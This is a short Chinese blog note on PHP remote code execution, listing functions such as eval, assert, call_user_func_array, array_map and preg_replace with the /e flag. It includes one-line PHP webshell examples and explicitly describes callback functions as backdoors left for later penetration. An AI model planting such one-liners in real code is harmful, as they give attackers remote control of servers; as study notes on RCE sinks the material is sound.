当前位置: 首页 > news >正文

RCE随笔(1)

news 2025/7/21 7:24:03

哪些是可以执行代码执行:php代码。

eval

如:eval:<?php eval($_post['key']);

eval:php中不被叫做函数叫动态执行命令

assert:执行函数

 call_user_func_array

<?php call_user_func_array('assert',array($_REQUEST['shu']));

传入xxs-labs/test.php?shu=phpinfo();

 

回调回门(用于留后门的,方便下次渗透):

回调后门的闭住:call_user_func()

call_user_func_array()

 call_user_func

 array_filter

  arrya_map

 uasort、uksort、array_walk、array_walk_recursive

preg_replace

当匹配的格式有|e的时候匹配到的字符会投到eval里面执行

哪些是可以执行命令:服务器的命令。

http://www.dtcms.com/a/288901.html

相关文章:

  • Node.js worker_threads 性能提升
  • VUE2 学习笔记2 数据绑定、数据代理、MVVM
  • 习题4.4 给出4个湖从大到小的顺序
  • 交通出行大前端与 AI 融合:智能导航与出行预测
  • 详解Mysql Order by排序底层原理
  • 黑马教程Webday6
  • 【Docker基础】Docker-compose常用命令实践(二):状态与日志查看
  • kafka生产端和消费端的僵尸实例以及解决办法
  • Vue开发前端报错:‘vue-cli-service‘ 不是内部或外部命令解决方案
  • 【Java学习|黑马笔记|Day18】Stream流|获取、中间方法、终结方法、收集方法
  • 【Linux】2. Linux下的C/C++开发环境
  • 【UE5医学影像可视化】读取dicom数据生成2D纹理并显示
  • pytest-log
  • 嵌入式Linux:获取线程ID
  • 数组算法之【合并两个有序数组】
  • 137. Java 泛型 - 泛型与通配符:子类型化关系
  • 【Linux】权限详解 权限本质、权限属性、su、sudo提权、chmod\chown\chgrp、文件类别
  • RxSwift-事件属性
  • Vuex 核心知识详解:Vue2Vue3 状态管理指南
  • Servlet快速入门
  • Docker在NAS部署MoonTV+OrionTV
  • 44.sentinel授权规则
  • tidyverse-数据读入
  • 基于智慧经营系统的学校住宿登记报表分析与应用探究-毕业论文—仙盟创梦IDE
  • 如何防止任务长期处于“等待”状态
  • Python基础和高级【抽取复习】
  • 基于单片机的自动条幅悬挂机
  • Leetcode 06 java
  • SpringBoot的配置文件
  • 【micro:bit】从入门到放弃(四):高级指令:函数、数组、文本、高级LED、引脚配置